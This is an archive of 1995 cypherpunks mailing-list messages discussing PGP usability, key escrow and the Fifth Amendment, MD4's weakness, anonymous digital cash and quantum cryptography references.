that "Trolling for foreign secrets, NSA routinely picks up
Americans' overseas calls. And it's legal." On Friday, the
article reports, "The next war will be fought with computers.
NSA is getting ready." You will be able to buy a reprint of the
NSA stories from SunSource. $3.95. Call 410-332-6962.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 10 Dec 95 10:05:22 PST
To: khijol!netcom.com!ecarp@homeport.org
Subject: Re: More FUD from First Virtual
In-Reply-To: <199512101114.FAA26720@khijol>
Message-ID: <199512101808.NAA06132@homeport.org>
MIME-Version: 1.0
Content-Type: text


Ed Carp wrote:

| Adam Shostack <adam@homeport.org>
| > jim bell wrote:
| > 
| > [Good points about cost of transactions deleted]
| > 
| > | The answer, I think, is that there would be no problem finding people to
| > | take that risk in exchange for the return, ESPECIALLY if they have some
| > | input into the design (level of security) of the system.  They might insist
| > | on 2048-bit RSA keys, instead of 1024-bit, for example.
| > 
| > 	(I know it's only an example, but...)
| > 
| > 	Key length is not what is needed for better security; more
| > solid code and better interfaces are needed.  (I might also argue for
| > hardware keys that are more difficult to steal..)
| 
| Nonsense.  The code is pretty solid, the interfaces aren't very 
| difficult.  What is needed is better human management of keys.  Why 
| brute-force, why look for weak keys, why bother calculating how much 
| safer 2047-bit keys are rather than 1024-bit keys when someone can 
| look on your HD and find your secret key, when they can open your 
| desk drawer and find your pass phrase or password, when they can 
| guess that you used your wife's maiden name as your password?
|
| Adam, I don't understand why you wrote nonsense in the first 
| paragraph, then followed it up with textbook attacks such as:

	I use PGP because it's pretty good, but if I was going to trust
all my money to it, I'd want better code (especially in key
management.  And the Mac port needs a few man months of work. ;) I
don't know how solid the code is in the ecash client.  I do know that
Netscape & Microsoft can't seem to ship decent code.   (This is a
reflection of the way the industry has evolved; the first system to
require a bigger processor due to creeping featuritis gets the most
market share.   Quality of code seems to be unimportant.)  No flame at
Netscape here; they're doing what the market, conditioned by MS to
never expect bug free code, seems to want.

	Further, the interfaces are not decent.  Ever tried teaching
your mother to use PGP?  I have a lot of smart friends; a lot of them,
while understanding how easy it is to read mail in transit, haven't
found a PGP front end that's easy enough to use that they will use it.
(This is not an invitation to send me your favorite GUI to PGP
(although if anyone has a web page of all/most of them, with reviews &
comments and maybe even screen shots, I'd like the URL.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 10 Dec 95 10:07:53 PST
To: Daniel Miskell <DMiskell@envirolink.org>
Subject: Re: The Elevator Problem
In-Reply-To: <9512101551.AA02550@envirolink.org>
Message-ID: <Pine.3.89.9512101225.B25354-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 10 Dec 1995, Daniel Miskell wrote:

> I think i was misunderstood.  I was not referring to the actual use of light 
> in the communications process.  I was talking about the key generation method 
> suggested in that article.  Of course the use of light is impractical for most 
> - the need for direct fiberoptics aside, you have to be able to test a photon 
> for its polarized orientation.  In any case, i dig on.

I didn't read the Discover article, but I did see it in Applied Crypto, 
1st edition. The polarization thing was used for eavesdropper detection, 
rather than key generation (I think, and I may be quite wrong).

The paper was intended to show that you could have unconditional security
even if P=NP (I even think that was one of the paper titles), so the authors
used a one time pad (and used whatever key generation method is usually used
for OTPs, ie coin flips, real RNGs and whatnot). So nothing special or new 
with regards to key generation. (Of course they may have newer papers...Any 
hints folks?)

Incidentally, Brassard wrote a nice and very short intro to modern crypto
that's in the Springer-Verlag Lecture Notes in Computer Science series.
I think Applied Cryptology was the title. It had good coverage of his quantum
crypto scheme. It ought to be in any university library.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 10 Dec 95 11:30:31 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Free calls to Govt (fwd)
Message-ID: <Pine.ULT.3.91.951210133052.27659A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is being forwarded from the ALA Intellectual Freedom mailing list.  
Thought it might be important here :-)

- ---------- Forwarded message ----------
Date: Sun, 10 Dec 1995 09:59:48 -0500
From: Charles Willett <willett@AFN.ORG>
To: Multiple recipients of list ALAOIF <ALAOIF@UICVM.CC.UIC.EDU>
Subject: Free calls to Govt (fwd)

- ---------- Forwarded message ----------
Date: Sat, 9 Dec 1995 14:31:58 -0700
From: El Tiburon <proteios@indirect.com>
To: internet_censorship@monad.net
Subject: Free calls to Govt

1) Dial 1-800-444-1555

2) They will give you a short recorded message.

3) Follow instructions if you have a touch tone phone, public ones work
best and they have other advantages. :>

4) Enter a zip code...they ask for yours but it doesn't have to be...it can
be any in the US.

5) Make a choice of the elected politician's office you want to be connected to.

6) When the staff person answers you are set to discuss the proposed
environmental reform regulations, OR ANY OTHER ISSUE YOU WANT!

Couple of tricks...we found they limit the number of calls to 3 from each
number.  Solution:  public phones are everywhere...enjoy Exxon's
corporate attempt to influence "grassroots democracy".



M
      ______________________________________________________

Activism - Isn't it just participation?

                      Internet Users Consortium
                    7031 E. Camelback Ste 102-515
                        Scottsdale, AZ 85251

IUC URL:   http://www.indirect.com/www/molsen/
Proteios URL: http://www.indirect.com/www/proteios/



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 10 Dec 95 11:00:50 PST
To: cypherpunks@toad.com
Subject: Re:  Is it possible?
Message-ID: <9512101857.AA07825@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> How can I be
>sure that the source has not been modified from the original distribution 
>before it is compiled?

Impossible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PasPossible@hudson.lm.com (JustMe)
Date: Wed, 13 Dec 95 04:39:59 PST
Subject: PGP status in russia
Message-ID: <PasPossible-1012951419480001@ppp073-sf2.sirius.com>
MIME-Version: 1.0
Content-Type: text/plain


does anybody know the legal status
of using encrypted email in russia?

i'm trying to talk nasty 
to a lady in moscow
who's using a borrowed account
and we'd like to keep the messages
somewhat private

anybody know the law there?
thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 10 Dec 95 12:33:36 PST
To: Adam Shostack <cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: More FUD from First Virtual
Message-ID: <199512102134.PAA19064@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> From:          Adam Shostack <adam@homeport.org>
> Subject:       Re: More FUD from First Virtual
> To:            khijol!netcom.com!ecarp@homeport.org
> Date:          Sun, 10 Dec 1995 13:08:29 -0500 (EST)
> Cc:            cypherpunks@toad.com (Cypherpunks Mailing List)

> Ed Carp wrote:
> 
> | Adam Shostack <adam@homeport.org>
> | > jim bell wrote:
> | > 
> | > [Good points about cost of transactions deleted]
> | > 
> | > | The answer, I think, is that there would be no problem finding people to
> | > | take that risk in exchange for the return, ESPECIALLY if they have some
> | > | input into the design (level of security) of the system.  They might insist
> | > | on 2048-bit RSA keys, instead of 1024-bit, for example.
> | > 
> | > 	(I know it's only an example, but...)
> | > 
> | > 	Key length is not what is needed for better security; more
> | > solid code and better interfaces are needed.  (I might also argue for
> | > hardware keys that are more difficult to steal..)
> | 
> | Nonsense.  The code is pretty solid, the interfaces aren't very 
> | difficult.  What is needed is better human management of keys.  Why 
> | brute-force, why look for weak keys, why bother calculating how much 
> | safer 2047-bit keys are rather than 1024-bit keys when someone can 
> | look on your HD and find your secret key, when they can open your 
> | desk drawer and find your pass phrase or password, when they can 
> | guess that you used your wife's maiden name as your password?
> |
> | Adam, I don't understand why you wrote nonsense in the first 
> | paragraph, then followed it up with textbook attacks such as:
> 
> 	I use PGP because it's pretty good, but if I was going to trust
> all my money to it, I'd want better code (especially in key
> management.  And the Mac port needs a few man months of work. ;) I
> don't know how solid the code is in the ecash client.  I do know that
> Netscape & Microsoft can't seem to ship decent code.   (This is a
> reflection of the way the industry has evolved; the first system to
> require a bigger processor due to creeping featuritis gets the most
> market share.   Quality of code seems to be unimportant.)  No flame at
> Netscape here; they're doing what the market, conditioned by MS to
> never expect bug free code, seems to want.

As I understand it, the problems in the code aren't the result of the 
underlying algorithm being flawed, but a flawed implementation, 
especially in the areas of key management, RNG, and the amount of 
information revealed in the final encrypted product.  As far as 
anyone can tell (unfortunately, as BS pointed out, we don't have the 
mathematical tools to prove one way or the other that RSA or BBS or 
any of that algorithmical "stuff" is secure or not) the algorithms 
are secure.  The problem can almost always be traced back to either a 
poor implementation or poor QA/QC, something that TQM and all the 
current management buzzwords are going to do nothing to fix.

> 	Further, the interfaces are not decent.  Ever tried teaching
> your mother to use PGP?  I have a lot of smart friends; a lot of them,
> while understanding how easy it is to read mail in transit, haven't
> found a PGP front end that's easy enough to use that they will use it.

I wasn't referring to the user interface, I was referring to the code 
interface, but I'll comment on the user interface.

For most people, crypto is *hard* to understand.  If it's easy to 
understand, you're probably making a LOT of assumptions about key 
management for your user, and some of those are almost certainly 
going to be bad ideas - that's why PGP gives you such flexibility.  
If you want to shoot yourself in the foot with PGP, Phil will 
certainly let you, but not without warning you first.  IMO, taking 
the complexity out of the key management process will almost 
certainly lead to designers and programmers making bad decisions 
about how the process should work, and that's going to lead to a 
whole host of problems, most of which will come home to roost at PZ's 
doorstep.  Yes, you and I and most people on this list know that this 
is bullshit, but you'd be amazed at what people will believe - 
witness the "ASCII virus" crap we all had to endure a few months 
back.  There were a lot of people who actually believed it.

I haven't found *any* PGP code that was well-integrated into anyone's 
mailer (including my own).  Maybe the code for Pegasus is different - 
I certainly hope so.

I, as well as many people, have got wrapper scripts around vi and 
emacs and pico that will do automatic encryption/decryption/signing 
for elm and pine, but that's not Windows.  If I could get my mother 
to use UNIX, she'd find that she can send and receive 
encrypted/signed email as easily as she can unencrypted/unsigned 
email - the back-end work has all been done for her.  The problem is, 
she'd rather "do Windows" - the overall OS interface (if one can call 
Windows an OS) is a *lot* easier to work with and understand than 
UNIX is.  So, she's stuck with Pegasus and Eudora and such - and no 
way to do encryption and signing without having to go to a lot of 
trouble.

> (This is not an invitation to send me your favorite GUI to PGP
> (although if anyone has a web page of all/most of them, with reviews &
> comments and maybe even screen shots, I'd like the URL.)

I would, too... :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Sun, 10 Dec 95 14:54:15 PST
To: ecarp@netcom.com
Subject: Re: GAK and self-incrimination?
Message-ID: <199512102233.AA10816@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp writes:
> Greg Broiles writes:
>> Tim May writes:
>> 
>> >Consider this hypo: I send an encrypted message to a partner in crime
>> >containing plans for future crimes and descriptions of past crimes. I 
>> >don't GAK the message. The government prosecutes me under the 
>> >Anti-Terrorism and Child Protection Act of 1997.
>> >
>> >My defense? That GAKKing the message would be tantamount to incriminating
>> >myself, which the Fifth Amendment protects me against.         
>
>> The Fifth protects you against *compelled* self-incrimination . . . In
>> particular, you're free to simply not send the message at all. 
>
>I don't believe that that would be a consideration.  Wasn't there a 
>court case a few years ago, in which a convicted criminal sued the 
>government, charging that filling out one of those forms that you 
>have to fill out when you buy a gun was a violation of his 5th 
>amendment rights?  What ever happened to that case?

This sounds like _Haynes v. United States_ 390 US 85 (1968); the Supreme
Court ruled that requiring registration of particular weapons (possession of
which was illegal) violated the Fifth Amendment. The difference between
_Haynes_ (and _Albertson v. Subversive Activities Control Board_ 382 US 70
(1965)) and Tim's hypo is that Tim's hypo doesn't force only guilty people
to provide information, it requires all people using crypto to do so - so
it's not targeted at "persons inherently suspect of criminal activities"
(see _Haynes_ at 96, _Anderson_ at 79), and it doesn't necessarily give rise
to "real and appreciable hazards of incrimination" (_Haynes_ at 97).

But it seems to me that the real bottom line is that the information which
is compelled is not incriminating, and the information which is
incriminating is not compelled. The keys to my crypto might lead to
incriminating evidence, or they might prove to be useful in a prosecution,
but they're not in themselves any sort of a signal that a crime has been or
will be committed.

I think it's a different argument - and probably even comes out the other
way - if the command to reveal a key is made to a particular individual in
circumstances where possession/knowledge of the key is likely to implicate
the holder in criminal activity. If the police find an encrypted disk which
is labelled "The Story of How I Killed Jimmy Hoffa and Where I Put His Body
and the Murder Weapon", compelling someone to reveal the key which decrypts
the file(s) on that disk seems incriminating, even if the information
produced (the string of binary digits which is the key) isn't by itself
incriminating.

Is it "self-incrimination" to require people to provide the government with
an address when they register a car, even though the police may use that
address to look for evidence if you're suspected of a crime? Is it
"self-incrimination" to require drivers involved in an auto accident to
remain at the scene and provide a name and address to cops or other drivers?
(Supreme Court says no self-incrim re hit & run statute, _California v.
Byers_, 402 US 424 (1971).) (Now, if the government required people who
weren't using GAK to provide a "Statement of Refusal to Comply with GAK", I
think it'd be a different kettle of fish entirely.) 

I'm not trying to say that I think GAK is good - I think it's awful. But I
don't think it's incompatible with the way that the Fifth amendment has been
interpreted over the past 200 years. I think it's possible to ignore those
interpretations and make up your own, but I don't think that's of much
practical utility where the dominant local gang doesn't find your theory
plausible or expedient. So much for the rule of law.

>I also think that, besides the obvious 5th amendment problems, there 
>would be a 1st amendment problem - if you *had* to use GAK to 
>communicate, that would be an impermissible restriction on your 1st 
>amendment rights.                       

I agree with you re the First amendment.
--
"The anchored mind screwed into me by the psycho-    Greg Broiles
lubricious thrust of heaven is the one that thinks   
every temptation, every desire, every inhibition."   greg@goldenbear.com
	-- Antonin Artaud		   gbroiles@darkwing.uoregon.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 10 Dec 95 11:36:12 PST
To: cypherpunks@toad.com
Subject: Qcrypto page, Brassard's book, Re: The Elevator Problem
In-Reply-To: <Pine.3.89.9512101225.B25354-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.3.89.9512101440.A22869-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 10 Dec 1995 I mistakenly wrote:

> Incidentally, Brassard wrote a nice and very short intro to modern crypto
> that's in the Springer-Verlag Lecture Notes in Computer Science series.
> I think Applied Cryptology was the title. It had good coverage of his quantum
> crypto scheme. It ought to be in any university library.

Sorry, it's Modern Cryptology: A tutorial, 1988.
You'll find good info in <http://www.iro.umontreal.ca/labs/theorique>
(the titles are in French, but don't worry, the text in the "cryptographie
quantique" section is in English and has plenty of links to papers. Also
weird stuff like quantum teleportation. You'll also see Brassard and 
Crepeau's home pages.)

If you run into the listing for the Discover article, please pass it on,
I keep putting that one off.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sun, 10 Dec 95 13:00:40 PST
To: frissell@panix.com
Subject: Re: More FUD from First Virtual
Message-ID: <01HYNC6OW73K8Y4X93@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell"  8-DEC-1995 16:15:52.58

At 02:52 PM 12/8/95 -0500, Jon Cooper wrote:

>   The US government can stop it.  It is irrelevant what *should* stop 
>it, but it's extremely useful to note that the US government's political 
>climate of paranoia and FUD in general will certainly not allow truly 
>anonymous cash systems inside of our country in the foreseeable future.

But who's going to ask?  If an anonymous payment system springs up outside
the US, we can use it as a store of value if nothing else or for shopping
overseas. 
Domestically, we can convert non-anonymous payment systems into
semi-anonymous ones.  What counts is difficulty of transaction and market
demand not legal structure.  Thus, about five minutes after the "temporary
VISA card" travelers check substitutes are issued, I can start selling them
for (discounted) cash to all comers.  Likewise Ecash laundry servers letting
anonymous people use non-anonymous Ecash.

It remains to be seen how much customers value anonymity.  There should be a
niche market in any case.
----------------------
	I would also add that what one is doing when trading digital cash is
bartering for information. While the government has been successful in placing
limits on point-based bartering systems such as recordkeeping and taxes, the
lack of central books will make it quite hard to do so for digital cash. Trying
to outlaw barter arrangements, when what is being bartered is an apparently
random string of numbers, is quite simply not going to work.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sun, 10 Dec 95 13:14:35 PST
To: cypherpunks@toad.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <01HYNCMO0E728Y4X93@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: futplex@pseudonym.com (Futplex)

It seems to me that end-to-end encryption is not significantly more important
for remailed messages. Really, there's less information in the message when
it emerges from the last remailer, so there's less to protect than in the
ordinary case. Furthermore, it may not even be feasible, since I may not have 
a public key I can associate with my correspondent.
------------------------------------------
	A possible solution: the correspondent generates a new public key and
sends it as part of the transaction. The key is then wiped afterward. Sorry if
this isn't possible due to something that I've misunderstood.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sun, 10 Dec 95 13:24:43 PST
To: cypherpunks@toad.com
Subject: Re: Free calls to Govt (fwd)
Message-ID: <01HYND12J2KI8Y4X93@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I've been told that number is out of date. Since I forgot to save it,
would someone who did check and find out?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Sun, 10 Dec 95 14:39:14 PST
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Free calls to Govt (fwd)
Message-ID: <199512102238.PAA23008@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I did and it did not work.


At 04:22 PM 12/10/95 EDT, you wrote:
>	I've been told that number is out of date. Since I forgot to save it,
>would someone who did check and find out?
>	Thanks,
>	-Allen
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John H. Wynne" <johnny@engineering.ucsb.edu>
Date: Sun, 10 Dec 95 16:45:54 PST
To: cypherpunks@toad.com
Subject: mailing List
Message-ID: <199512110045.AAA06366@gear>
MIME-Version: 1.0
Content-Type: text/plain


Please put me on your mailing list





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 10 Dec 95 13:50:45 PST
To: Ed Carp <ecarp@netcom.com>
Subject: Re: GAK and self-incrimination?
In-Reply-To: <199512101959.NAA14976@khijol>
Message-ID: <Pine.BSF.3.91.951210164405.3557F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Ed Carp wrote:

> > Date:          Sun, 10 Dec 1995 02:57:36 -0800
> > To:            cypherpunks@toad.com
> > From:          Greg Broiles <gbroiles@darkwing.uoregon.edu>
> > Subject:       Re: GAK and self-incrimination?
> > Cc:            tcmay@got.net
> 
> > 
> > Tim May writes:
> > 
> > >Consider this hypo: I send an encrypted message to a partner in crime
> > >containing plans for future crimes and descriptions of past crimes. I don't
> > >GAK the message. The government prosecutes me under the Anti-Terrorism and
> > >Child Protection Act of 1997.
> > >
> > >My defense? That GAKKing the message would be tantamount to incriminating
> > >myself, which the Fifth Amendment protects me against.      
> > 
> > The Fifth protects you against *compelled* self-incrimination - in
> > particular, the right to be free from the "cruel trilemma" of
> > 
> >         o       conviction of a substantive crime, based on your
> >                 (true) testimony
> >         o       conviction of perjury, for lying when asked to incriminate
> >                 yourself
> >         o       contempt of court sanctions, for refusing to answer
> > 
> > but your hypo doesn't seem to create that forbidden situation. In
> > particular, you're free to simply not send the message at all. 
> 
> I don't believe that that would be a consideration.  Wasn't there a 
> court case a few years ago, in which a convicted criminal sued the 
> government, charging that filling out one of those forms that you 
> have to fill out when you buy a gun was a violation of his 5th 
> amendment rights?  What ever happened to that case?

I think you are referring to the so-called "exculpatory no" exception, 
which says that it is not a crime to say no on a government form when 
saying yes would admit a crime.

That exception has been given some validity in some Circuit Courts of 
Appeal, but not in the Sixth Circuit where I practice.  Perhaps others 
can comment on the Ninth Circuit, et al.  If the issue has made it to the 
Supreme Court, I'm unaware of it (although I'd almost certainly know if the 
doctrine was accepted by the Court and the Sixth Circuit therefore 
overruled...)

Moral:  It may still be important *where* you are, ahem, less than 
completely forthcoming.


EBD

 
> I also think that, besides the obvious 5th amendment problems, there 
> would be a 1st amendment problem - if you *had* to use GAK to 
> communicate, that would be an impermissible restriction on your 1st 
> amendment rights.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 10 Dec 95 13:55:15 PST
To: John Lull <lull@acm.org>
Subject: Re: Escrow expectations
In-Reply-To: <30cae91c.1391349@smtp.ix.netcom.com>
Message-ID: <Pine.BSF.3.91.951210165108.3557G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, John Lull wrote:

> Russell Nelson <nelson@crynwr.com> wrote:
> 
> > > Duncan Frissell writes:
> 
> > >  > If Clipper were mandated you might be able to resist a prosecution for
> > >  > "failure to file" keys or for double encrypting your transmissions if you
> > >  > could prove that you were transmitting illegal messages or evidence of a
> > >  > crime.  Just as those who possess illegal weapons are not required to
> >              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > >  > register them (self incrimination).  You have to be sure your traffic is
> >      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > 
> > You are mistaken here.  Failure to get a permit before turning a 
> > semi-auto firearm into a fully-auto machine gun, for example, is illegal 
> > as is possessing an unregistered machine gun ...
> 
> My understanding was that, for example, a convicted felon in possession
> of a handgun where handguns must be registered could be charged with
> being a convicted felon in possession of a firearm.  He could NOT be
> charged with possession of an unregistered handgun, because requiring
> him to register, when it is illegal for him to possess, is a violation
> of his first amendment rights.


In many/most federal jurisdictions, you are mistaken.  See my previous 
note about the exculpatory no exception.  Of course, he need 
only fill out the form if purchasing from a federally licensed firearms 
dealer, not, say, at a flea market.
 
EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Dec 95 14:14:35 PST
To: dan@milliways.org (Dan Bailey)
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
In-Reply-To: <199512090547.FAA21624@pop01.ny.us.ibm.net>
Message-ID: <199512102214.RAA22512@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Bailey writes:
> No, but they're doing something that makes me very uncomfortable:  As
> I read this, they're hashing the password and some other user
> information using MD4 then doing some proprietary permutations on
> that.  Given their record with security, I'd rather they used straight
> MD4, rather than throwing in something that we can't analyze.

MD4 has been broken. I thought that was common knowledge. MD5 is still
safe, of course.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 10 Dec 95 14:53:45 PST
To: perry@piermont.com
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
In-Reply-To: <199512102214.RAA22512@jekyll.piermont.com>
Message-ID: <95Dec10.175318edt.1732@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> MD4 has been broken. I thought that was common knowledge. MD5 is still
> safe, of course.
> 
> Perry

My understanding was that MD4 had been broken once, at the cost of 
much computer time.  Is it not still considered strong enough for 
casual use, much as a 512-bit RSA key is?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Dec 95 14:56:29 PST
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
In-Reply-To: <95Dec10.175318edt.1732@cannon.ecf.toronto.edu>
Message-ID: <199512102256.RAA22618@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



SINCLAIR DOUGLAS N writes:
> My understanding was that MD4 had been broken once, at the cost of 
> much computer time.  Is it not still considered strong enough for 
> casual use, much as a 512-bit RSA key is?

You can get export licenses for systems using 512 bit RSA.

I'll leave the rest to your imagination.

I generally don't believe in using stupid algorithms if good ones are
around and cost no more. MD5 isn't more expensive than MD4 except if
you are in some very borderline sort of case.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 10 Dec 95 15:22:56 PST
To: cypherpunks@toad.com
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
Message-ID: <199512102320.SAA08162@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <95Dec10.175318edt.1732@cannon.ecf.toronto.edu>,
SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu> wrote:
> My understanding was that MD4 had been broken once, at the cost of 
> much computer time.

Not *that* much computer time...

In my copy of Hans Dobbertin's paper, the abstract says 

``An implementation of our 
attack allows to find collisions for MD4 in less than a minute on a PC.''

As far as I know, the difficulty of inverting MD4 is still an open
problem -- but why would you want to use a broken algorithm like MD4
when you can use MD2, MD5, or SHA?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMtrRCoZzwIn1bdtAQGQwQF+JlWjDgMCs+Y6nO/tUzrXcd9wJCrTLHx2
NlC+1bHspTvJSXSD29M73rfeyOfWOTtQ
=4jl6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sun, 10 Dec 95 11:25:43 PST
To: cypherpunks@toad.com
Subject: Re: Escrow expectations
In-Reply-To: <Pine.BSF.3.91.951210013752.18670D-100000@mercury.thepoint.net>
Message-ID: <30cae91c.1391349@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Russell Nelson <nelson@crynwr.com> wrote:

> > Duncan Frissell writes:

> >  > If Clipper were mandated you might be able to resist a prosecution for
> >  > "failure to file" keys or for double encrypting your transmissions if you
> >  > could prove that you were transmitting illegal messages or evidence of a
> >  > crime.  Just as those who possess illegal weapons are not required to
>              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >  > register them (self incrimination).  You have to be sure your traffic is
>      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> 
> You are mistaken here.  Failure to get a permit before turning a 
> semi-auto firearm into a fully-auto machine gun, for example, is illegal 
> as is possessing an unregistered machine gun ...

My understanding was that, for example, a convicted felon in possession
of a handgun where handguns must be registered could be charged with
being a convicted felon in possession of a firearm.  He could NOT be
charged with possession of an unregistered handgun, because requiring
him to register, when it is illegal for him to possess, is a violation
of his first amendment rights.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sun, 10 Dec 95 17:27:21 PST
To: cypherpunks@toad.com
Subject: [NOISE] REQ: "Markov" filter as recently posted in .shar form
Message-ID: <199512110127.UAA22346@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



Apologies, but I already tried all standard net searches on this. Someone
recently posted a .shar archive for a program called Markov, which filters
input Usenet posts and outputs a reasonable facsimile of that person's
"style". (It was posted in one of the "Alice" threads, in response to the
claim that posting styles could be a unique form of identification.) I
also looked on the archives at hks.net, but had no luck there. If some
kind person will post it again, I'll give it a home on my page of WWW
resources. I have the binary, and am impressed and amused enough to keep
it for regular use.. anyone for alt.usenet.kooks.markov? 

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
